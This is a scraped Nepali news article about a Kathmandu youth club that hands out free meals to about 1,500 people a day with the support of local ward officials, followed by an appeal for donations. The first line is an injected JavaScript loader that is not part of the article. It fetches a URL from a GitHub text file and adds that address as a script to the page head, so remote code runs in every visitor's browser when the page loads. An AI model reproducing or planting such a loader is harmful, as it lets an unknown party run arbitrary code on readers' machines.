;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
बैशाख १९,
काठमाडौँ | गैरीगाऊ युवा क्लबले जोरपटी ओरालो एभरेष्ट बैंक पछाडी निशुल्क खाना बितरण गरेको छ |
गोकर्नेश्वोर नगरपालिका वडा न ५ का वडा अध्यक्ष नारायण बहादुर सुबेदी, गोकर्णेश्वर वडा ६ का वडा अध्यक्ष रमेश अर्याल, बरिष्ठ समाजसेवी सम्भु प्रसाद अधिकरी र दिपक लामा को सहयोग तथा संरक्षणमा दैनिक १५०० को हराहरिमा गैरिगाऊ टोल वासीले बैसाख ६ गते देखी नि:शूल्क खाना बितरण गरिरहेको छ।
यस्तो निष्पक्ष भावनाको कदर गर्दै बिभिन्न संस्थ एवंम बिशाल हृदयका व्यक्तिहरुले गैरिगाऊ युवा क्लब लाई जिन्सी तथा अर्थिक सहयोग गर्दै आएका छन ।
यो सम्पुर्ण न्यूज पढ्ने व्यक्तिलाई महान सेवामा टेवा पुराईदिन सहयोगको अपिल गर्दछ, क्लबका अधयक्ष सुनिल तामाङ, उपाध्यक्ष शिब भक्त शाही, सचिब दिपेश शाही (९८६०१५८३८७)
फेसबुक प्रतिक्रियाहरु